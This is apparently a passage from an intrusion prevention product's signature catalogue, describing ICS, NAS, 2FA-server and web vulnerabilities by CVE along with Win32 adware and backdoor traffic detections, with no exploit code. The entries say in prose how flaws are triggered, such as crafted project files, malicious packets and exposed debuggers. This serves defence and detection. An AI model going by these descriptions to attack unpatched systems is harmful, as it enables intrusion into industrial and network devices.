Improper validation of data in the BaseSet tag of received UMP files causes a buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit can allow an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Wecon-LeviStudioU-Baseset-Hminame-Stack-Buffer-Overflow

References:

CVE-2021-43983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43983

Wecon-LeviStudioU-Baseset-Scridwordaddr-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

High

First detected in:

sgpkg-ips-1460-5242

Last changed:

sgpkg-ips-1460-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in Wecon LeviStudioU. The vulnerability is due to improper validation of the length of user-supplied data in ScrIdWordAddr attribute within the BaseSet Tag of UMP files. A remote attacker could exploit this vulnerability by enticing a user into opening a crafted UMP file. Successful exploitation could allow the attacker to execute arbitrary code under the context as SYSTEM.

Situation:

File-TextId_Wecon-LeviStudioU-Baseset-Scridwordaddr-Stack-Buffer-Overflow

References:

CVE-2021-43983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43983

Wecon-LeviStudioU-CharSize-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in WECON LeviStudioU

Risk:

High

First detected in:

sgpkg-ips-1299-5242

Last changed:

sgpkg-ips-1299-5242

Platform:

Linux; Windows

Software:

Wecon LeviStudio

Type:

Input Validation

Description:

There exists a stack buffer overflow vulnerability in Wecon LeviStudiU, version 1.8.80, which allows remote attackers to execute arbitrary code via a specially crafted HSC file, due to the improper validation of the length of data in the CharSize attribute.

Situation:

File-TextId_Wecon-LeviStudioU-CharSize-Stack-Buffer-Overflow

References:

CVE-2020-16243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16243

Wecon-LeviStudioU-Disc-Tag-WordAddr-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudioU
Risk:	Moderate
First detected in:	sgpkg-ips-1486-5242
Last changed:	sgpkg-ips-1486-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Improper validation of the length of user-supplied data in UMP files causes a stack buffer overflow in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	File-TextId_Wecon-LeviStudioU-Disc-Tag-WordAddr-Stack-Buffer-Overflow

Wecon-LeviStudioU-Hft-File-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

Moderate

First detected in:

sgpkg-ips-1299-5242

Last changed:

sgpkg-ips-1299-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

Improper validation of the length of user-supplied data in HFT files causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit can allow an attacker to execute arbitrary code with the privileges of the affected process.

Situation:

File-Binary_Wecon-LeviStudioU-Hft-File-Parsing-Stack-Buffer-Overflow

References:

CVE-2020-16243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16243

Wecon-LeviStudioU-Hft-File-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in WECON LeviStudioU

Risk:

High

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1320-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Wecon LeviStudio, versions Build 2019-09-21 and prior, which allows remote attackers to excute arbitrary code due to the insufficient validation of the length of user-supplied data in HFT files.

Situation:

File-Binary_Wecon-LeviStudioU-Hft-File-Stack-Buffer-Overflow

References:

CVE-2020-16243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16243

Wecon-LeviStudioU-MultiLink-Bitaddr-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in WECON LeviStudioU
Risk:	High
First detected in:	sgpkg-ips-1275-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	There exists a buffer overflow vulnerability in WECON LeviStudioU which allows remote attackers to execute arbitrary code due to the insufficient validation of the length of user-supplied data in the MultiLink tag of UMP files.
Situation:	File-TextId_Wecon-LeviStudioU-MultiLink-Bitaddr-Stack-Buffer-Overflow

Wecon-LeviStudioU-MultiLink-WordAddr-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudiU
Risk:	High
First detected in:	sgpkg-ips-1285-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	There exists a stack buffer overflow vulnerability in LeviStudiU which allows remote attackers to exploit arbitrary code due to improper validation of user supplied data in the MultiLink tag of UMP files.
Situation:	File-TextId_Wecon-LeviStudioU-MultiLink-WordAddr-Stack-Buffer-Overflow

Wecon-LeviStudioU-Screeninfo-Scrnfile-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

Moderate

First detected in:

sgpkg-ips-1467-5242

Last changed:

sgpkg-ips-1467-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

Improper validation of the length of attribute value in the .ump project XML file causes a heap buffer overflow in Wecon LeviStudioU. A successful exploit allows an attacker to executer arbitrary code on the target system.

Situation:

File-TextId_Wecon-LeviStudioU-Screeninfo-Scrnfile-Heap-Buffer-Overflow

References:

CVE-2021-23157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23157

Wecon-LeviStudioU-Trend-WordAddr-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

Moderate

First detected in:

sgpkg-ips-1433-5242

Last changed:

sgpkg-ips-1433-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

Improper validation of the length of user-supplied data in WordAddr-related attributes within the Trend Tag in UMP project files causes a buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Wecon-LeviStudioU-Trend-WordAddr-Stack-Buffer-Overflow

References:

CVE-2021-43983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43983

Wecon-LeviStudioU-Xyset-WordAddr-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudioU
Risk:	Moderate
First detected in:	sgpkg-ips-1292-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability has been reported in Wecon LeviStudiU. The vulnerability is due to improper validation of the length of user-supplied data in the XYSet tag of UMP files. A remote attacker could exploit this vulnerability by enticing a user into opening a crafted UMP file. Successful exploitation could allow the attacker to execute arbitrary code under the context of users.
Situation:	File-TextId_Wecon-LeviStudioU-Xyset-WordAddr-Stack-Buffer-Overflow

Wecon-Pistudio-Basedll-Textcontent-Stack-Based-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon PI Studio HMI Project Programmer
Risk:	Moderate
First detected in:	sgpkg-ips-1119-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon PIStudio
Type:	Buffer Overflow
Description:	Improper parsing of TextContent elements in a HSC configuration file causes a stack-based buffer overflow vulnerability in Wecon PIStudio. A successful exploit allows an attacker to execute arbitrary code with the privileges of the target process.
Situation:	File-TextId_Wecon-Pistudio-Basedll-Textcontent-Stack-Based-Buffer-Overflow

Weintek-Easybuilder-Pro-Cmt-Series-Project-File-Directory-Traversal

About this vulnerability:

A vulnerability in Weintek EasyBuilder Pro cMT Series

Risk:

Moderate

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Generic

Software:

Weintek EasyBuilder Pro cMT Series

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Weintek EasyBuilder Pro cMT Series. The vulnerability is due to a lack of proper input validation when compiling project files. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted project file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-Binary_Weintek-Easybuilder-Pro-Cmt-Series-Project-File-Directory-Traversal

References:

CVE-2023-0104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0104

WellinTech-Kingscada-Kxnetdispose-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in WellinTech KingSCADA

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WellinTech KingSCADA

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in WellinTech KingSCADA. The vulnerability is due to insufficient validation on the size of the data. The vulnerable module is kxNetDispose.dll. The vulnerability, if exploited, results in the overwriting of the structured exception handler (SEH) in the AEserver.exe process listening on port 12401/TCP. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious packet to the KingSCADA server. Successful exploitation could lead to remote code execution under the security context of a privileged system user.

Situation:

Generic_CS-WellinTech-Kingscada-Kxnetdispose-Stack-Buffer-Overflow

References:

CVE-2014-0787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0787

BID-66709
http://www.securityfocus.com/bid/66709

OSVDB-105574
http://www.osvdb.org/105574

WellinTech-KingView-Kingmess-Log-File-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in WellinTech KingView

Risk:

Moderate

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WellinTech KingView

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in KingView's KingMess. The vulnerability is due to an error while parsing log files. An attacker can exploit this vulnerability by enticing a user to open a specially crafted log file. This can lead to a buffer overflow and possibly code execution in the context of the affected application. If code execution is unsuccessful, the application may terminate unexpectedly.

Situation:

File-Binary_WellinTech-KingView-Kingmess-Log-File-Parsing-Buffer-Overflow

References:

CVE-2012-4711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4711

OSVDB-89690
http://www.osvdb.org/89690

WellinTech-KingView-SCADA-Heap-Buffer-Overflow

About this vulnerability:

A heap bufferflow vulnerability in WellingTech Kingview

Risk:

High

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WellinTech KingView

Type:

Buffer Overflow

Description:

WellingTech Kingview contains a boundary error vulnerability when handling remote requests. Remote attackers could exploit this vulnerability by sending a malicious request to the target service. The exploit can potentially lead to arbitrary code execution or denial of service.

Situation:

Generic_CS-WellinTech-KingView-SCADA-Heap-Buffer-Overflow
Generic_CS-WellinTech-KingView-SCADA-Heap-Buffer-Overflow-2

References:

CVE-2011-0406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0406

BID-45727
http://www.securityfocus.com/bid/45727

OSVDB-70366
http://www.osvdb.org/70366

WellinTech-KingView-SCADA-Historyserver.exe-Opcode-3-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in WellinTech KingView

Risk:

Moderate

First detected in:

sgpkg-ips-441-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WellinTech KingView

Type:

Buffer Overflow

Description:

WellinTech KingView is a high-performance production SCADA software. KingView is widely used in power, water conservancy, buildings, coal mines, environmental protection, metallurgy and so on. A buffer overflow vulnerability exists in WellinTech KingView. The vulnerability is due to a boundary error while handling remote opcode 3 requests. Remote, unauthenticated attackers could exploit this vulnerability by sending a malicious request to the target service. Successful exploitation would cause injection and execution of arbitrary code in the context of the SYSTEM user. Unsuccessful attack attempts will terminate the service causing a denial-of-service (DoS) condition.

Situation:

Generic_CS-WellinTech-KingView-SCADA-Historyserver.exe-Heap-Buffer-Overflow

References:

CVE-2011-4536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4536

OSVDB-77992
http://www.osvdb.org/77992

WellinTech-KingView-SCADA-KVWebSvr.dll-ActiveX-Contorl-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in WellinTech KingView

Risk:

Moderate

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WellinTech KingView

Type:

Buffer Overflow

Description:

WellinTech KingView ActiveX control is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed attacks will likely cause denial-of-service conditions.

Situation:

File-Text_WellinTech-KingView-SCADA-KVWebSvr.dll-ActiveX-Contorl-Heap-Buffer-Overflow

References:

CVE-2011-3142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3142

BID-46757
http://www.securityfocus.com/bid/46757

OSVDB-72889
http://www.osvdb.org/72889

WellinTech-Multiple-Products-Kxclientdownload-ActiveX-Remote-Code-Execution

About this vulnerability:

A vulnerability in WellinTech KingGraphic

Risk:

Moderate

First detected in:

sgpkg-ips-567-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WellinTech KingGraphic; WellinTech KingSCADA

Type:

Input Validation

Description:

A remote code execution vulnerability exists in WellinTech multiple products. The vulnerability exists in ClientDownload.ocx ActiveX control and is due to insufficient sanitization of ProjectURL property. A remote unauthenticated attacker can leverage this vulnerability to download and load an arbitrary DLL file from a remote location. This can lead to code execution under the context of the administrator.

Situation:

File-Text_WellinTech-Multiple-Products-Kxclientdownload-ActiveX-Remote-Code-Execution

References:

CVE-2013-2827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2827

OSVDB-102135
http://www.osvdb.org/102135

WePresent-WiPG-1000-Command-Injection

About this vulnerability:	An attempt to exploit a WePresent WiPG-1000 Command Injection vulnerability detected
Risk:	High
First detected in:	sgpkg-ips-980-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	WePresent
Type:	Code Injection
Description:	A vulnerability in WePresent WiPG-1000, versions 2.0.0.7 and before, which allows remote attackers to execute commands via the rdfs.cgi script.
Situation:	HTTP_CRL-WePresent-WiPG-1000-Command-Injection

Werkzeug-Debugger-Remote-Code-Execution

About this vulnerability:	Werkzeug Debugger Remote Code Execution
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Insecure Configuration
Description:	Werkzeug is a widely used WSGI tool which includes a powerful debugger that can be used to execute code from within an internet browser. If the debug version of a web application faces the internet, a remote attacker can easily use it to execute remote code on the server running the application.
Situation:	HTTP_CRL-Werkzeug-Debugger-Remote-Code-Execution

Western-Digital-Arkeia-Remote-Code-Execution

About this vulnerability:

An Western Digital Arkeia Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Arkeia Network Backup

Type:

Insecure Configuration

Description:

A vulnerability in Western Digital Arkeia Network Backup, versions 11.0.12 and before, which allows remote attackers to bypass authentication and execute arbitrary commands via crafted requests to the ARKFS_EXEC_CMD operation.

Situation:

Generic_CS-Western-Digital-Arkeia-Remote-Code-Execution

References:

CVE-2015-7709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7709

Western-Digital-Arkeia-Unauthenticated-Script-Upload

About this vulnerability:

A Western Digital Arkeia Unauthenticated Script Upload vulnerability

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Western Digital Arkeia

Type:

Insecure Configuration

Description:

A vulnerability in Western Digital Arkeia, version 10.0.10, which allows remote attackers to have users execute arbitrary code by allowing file upload though the upload.php script, and local file inclusion in the lang cookie, without authentication.

Situation:

HTTP_CSH-Western-Digital-Arkeia-Unauthenticated-Script-Upload

References:

OSVDB-97614
http://www.osvdb.org/97614

Western-Digital-Multiple-Routers-Information-Disclosure

About this vulnerability:

A vulnerability in multiple Western Digital Routers

Risk:

High

First detected in:

sgpkg-ips-607-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Western Digital My Net N600; Western Digital My Net N750; Western Digital My Net N900

Type:

Malfunction

Description:

There is an information disclosure vulnerability in multiple Western Digital routers which allows remote attackers to discover the cleartext administrator password.

Situation:

HTTP_CSU-Western-Digital-Multiple-Routers-Information-Disclosure

References:

CVE-2013-5006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006

OSVDB-95519
http://www.osvdb.org/95519

Western-Digital-MyCloud-Multi_uploadify-File-Upload-Vulnerability

About this vulnerability:

A Western Digital MyCloud multi_uploadify File Upload vulnerability

Risk:

High

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WD My Cloud NAS

Type:

PHP Injection

Description:

A vulnerability in Western Digital MyCloud NAS web service that allows remote attackers to upload malicious PHP scripts anywhere on the device's file system without authentication, resulting in arbitrary code execution.

Situation:

HTTP_CRL-Western-Digital-MyCloud-Multi_uploadify-File-Upload-Vulnerability

References:

CVE-2017-17560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17560

Western-Digital-MyCloud-Unauthenticated-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Western Digital MyCloud detected

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Linux; Unix

Software:

WD MyCloud

Type:

Input Validation

Description:

A vulnerability in Western Digital MyCloud, versions before 2.30.196, which allows remote attackers to bypass authentication (CVE-2018-17153), and execute arbitrary commands through the echo command via /web/google_analytics.php (CVE-2016-10108).

Situation:

HTTP_CS-Western-Digital-MyCloud-Unauthenticated-Command-Injection

References:

CVE-2016-10108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10108

WhatsUp-Gold-Registry-Overwrite-CVE-2024-8785

About this vulnerability:

An attempt to exploit a vulnerability in Progress WhatsUp Gold detected

Risk:

High

First detected in:

sgpkg-ips-1807-5242

Last changed:

sgpkg-ips-1807-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Input Validation

Description:

In WhatsUp Gold versions released before 2024.0.1, a remote unauthenticated attacker could leverage "NmAPI.exe" to create or change an existing registry value in registry path "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\". This could result in remote code execution.

Situation:

Generic_CS-WhatsUp-Gold-Registry-Overwrite-CVE-2024-8785

References:

CVE-2024-8785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8785

Wibu-Systems-Wibukey-Runtime-For-Windows-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Wibu-Systems WibuKey Runtime for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WibuKey

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Wibu-Systems WibuKey Runtime for Windows. The vulnerability is due to a boundary error within the WkWin32.dll module when processing the "DisplayMessageDialog()" method. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.

Situation:

File-Text_Wibukey-Runtime-For-Windows-ActiveX-Control-Buffer-Overflow

References:

OSVDB-87881
http://www.osvdb.org/87881

WIKID-2fa-Enterprise-Server-ADM_usrs.jsp-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WiKID 2FA Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1234-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WiKID 2FA Enterprise Server

Type:

Input Validation

Description:

There has been reported a cross-site scripting vulnerability in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary script code execution in the target user's web browser.

Situation:

HTTP_CSU-WIKID-2fa-Enterprise-Server-ADM_usrs.jsp-Cross-Site-Scripting

References:

CVE-2019-17120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17120

WIKID-2fa-Enterprise-Server-Getdomainhash-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WiKID 2FA Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1219-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WiKID 2FA Enterprise Server

Type:

Input Validation

Description:

There exists a stored cross-site scripting vulnerability exists in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary script code execution.

Situation:

HTTP_CSU-WIKID-2fa-Enterprise-Server-Getdomainhash-Stored-Cross-Site-Scripting

References:

CVE-2019-17115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17115

WIKID-2fa-Enterprise-Server-Groups.jsp-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WiKID 2FA Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1232-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WiKID 2FA Enterprise Server

Type:

Input Validation

Description:

A stored and reflected cross-site scripting vulnerability exists in WiKID 2FA Enterprise Server. This vulnerability is due to insufficient validation of the user-supplied group name sent to the groups.jsp script. A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could allow the attacker to execute arbitrary script code in the context of the user's browser.

Situation:

HTTP_CRL-WIKID-2fa-Enterprise-Server-Groups.jsp-Cross-Site-Scripting

References:

CVE-2019-17116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17116

WIKID-2fa-Enterprise-Server-InitDevice-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WiKID 2FA Enterprise Server

Risk:

High

First detected in:

sgpkg-ips-1211-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WiKID 2FA Enterprise Server

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability exists in WiKID 2FA Enterprise Server. This vulnerability is due to insufficient validation of the user-supplied data in InitDevice servlets during writing log messages. A remote, unauthenticated attacker can exploit this vulnerability by sending an HTTP request with crafted HTTP parameters to the target server. Successful exploitation could allow the attacker to execute arbitrary script code in the context of the user's browser.

Situation:

HTTP_CRL-WIKID-2fa-Enterprise-Server-InitDevice-Stored-Cross-Site-Scripting

References:

CVE-2019-17115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17115

WIKID-2fa-Enterprise-Server-Log.jsp-SQL-Injection

About this vulnerability:

A vulnerability in WiKID 2FA Enterprise Server

Risk:

High

First detected in:

sgpkg-ips-1206-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WiKID 2FA Enterprise Server

Type:

Input Validation

Description:

A vulnerability in WiKID 2FA Enterprise Server, versions before 4.2.0-b2053, which allows remote attackers to execute arbitrary SQL commands, due to the insufficient user input validation of Log.jsp.

Situation:

HTTP_CRL-WIKID-2fa-Enterprise-Server-Log.jsp-SQL-Injection

References:

CVE-2019-17119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17119

WIKID-2fa-Enterprise-Server-Preregister-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WiKID 2FA Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WiKID 2FA Enterprise Server

Type:

Input Validation

Description:

There exists a pre-auth stored cross-site scripting vulnerability in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary script execution.

Situation:

HTTP_CRL-WIKID-2fa-Enterprise-Server-Preregister-Stored-Cross-Site-Scripting

References:

CVE-2019-17115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17115

WIKID-2fa-Enterprise-Server-Processpref.jsp-SQL-Injection

About this vulnerability:

A vulnerability in WiKID 2FA Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1202-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WiKID 2FA Enterprise Server

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary SQL command execution.

Situation:

HTTP_CRL-WIKID-2fa-Enterprise-Server-Processpref.jsp-SQL-Injection

References:

CVE-2019-17117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17117

WIKID-2fa-Enterprise-Server-Searchdevices.jsp-SQL-Injection

About this vulnerability:

A vulnerability in WiKID 2FA Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WiKID 2FA Enterprise Server

Type:

Input Validation

Description:

There exists a remotely exploitable post-auth SQL injection vulnerability in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary SQL command execution.

Situation:

HTTP_CRL-WIKID-2fa-Enterprise-Server-Searchdevices.jsp-SQL-Injection

References:

CVE-2019-16917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16917

WikkaWiki-Remote-PHP-Injection

About this vulnerability:

A WikkaWiki Remote PHP Injection vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WikkaWiki

Type:

Input Validation

Description:

A vulnerability in WikkaWiki, versions 1.3.1 and 1.3.2, which allows remote attackers to write arbitrary PHP code to the spamlog_path file via the User-Agent HTTP header in an addcomment request.

Situation:

HTTP_CS-WikkaWiki-Remote-PHP-Injection

References:

CVE-2011-4451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4451

OSVDB-77393
http://www.osvdb.org/77393

WildFly-Jboss-Undertow-Directory-Traversal

About this vulnerability:

A WildFly Jboss Undertow Directory Traversal vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

JBoss Undertow

Type:

Directory Traversal

Description:

A vulnerability in WildFly JBoss Undertow web server, version 8.1.0.Final, which allows remote attackers to read arbitrary files via a directory traversal in a resource URL.

References:

CVE-2014-7816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7816

Win-FTP-Server-Wftpsrv.exe-List-FTP-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in Win FTP Server

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Win FTP Server

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Win FTP Server WFTPSRV.exe.

Situation:

FTP_CS-Win-FTP-Server-Wftpsrv.exe-List-FTP-Command-Buffer-Overflow

References:

BID-33454
http://www.securityfocus.com/bid/33454

Win32-OTF-Validation-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in font handling

Situation:

File-Binary_Win32-OTF-Validation-Vulnerability

References:

CVE-2011-1873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1873

BID-48183
http://www.securityfocus.com/bid/48183

MS11-041
http://technet.microsoft.com/security/bulletin/MS11-041

Win32.Adware.Hotclip.A-Botnet

About this vulnerability:	Win32.Adware.Hotclip.A botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Adware.Hotclip.A is a malware that targets Windows hosts.
Situation:	HTTP_CRL-Hotclip.A-Traffic

Win32.Adware.Marketscore.B-Botnet

About this vulnerability:	Win32.Adware.Marketscore.B botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Adware.Marketscore.B is a malware that targets Windows hosts. It is used to decrypt and track traffic.
Situation:	HTTP_CRL-Marketscore.B-Traffic

Win32.Adware.MediaGet-Botnet

About this vulnerability:	Win32.Adware.MediaGet botnet
Risk:	High
First detected in:	sgpkg-ips-702-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Adware.MediaGet is an adware that targets Windows hosts.
Situation:	HTTP_CSU_Adware.MediaGet-Download-Site

Win32.Adware.SProtector.A-Botnet

About this vulnerability:	Win32.Adware.SProtector.A botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Adware.SProtector.A is an adware that targets Windows hosts.
Situation:	HTTP_CRL-SProtector.A-Traffic

Win32.Adware.WebCake-Botnet

About this vulnerability:	Win32.Adware.WebCake botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Adware.WebCake is an adware that targets Windows hosts. It displays pop-up advertisements on the affected machine.
Situation:	HTTP_CRL-WebCake-2-Traffic HTTP_CSH-WebCake-Traffic

Win32.Backdoor.Alusins.A-Botnet

About this vulnerability:	Win32.Backdoor.Alusins.A botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Backdoor.Alusins.A is a spyware that targets Windows hosts. The malware can be used to steal the user's personal information.
Situation:	Generic_CS-Alusins.A-Traffic

Win32.Backdoor.Bifrose.IQ-Botnet

About this vulnerability:	Win32.Backdoor.Bifrose.IQ botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
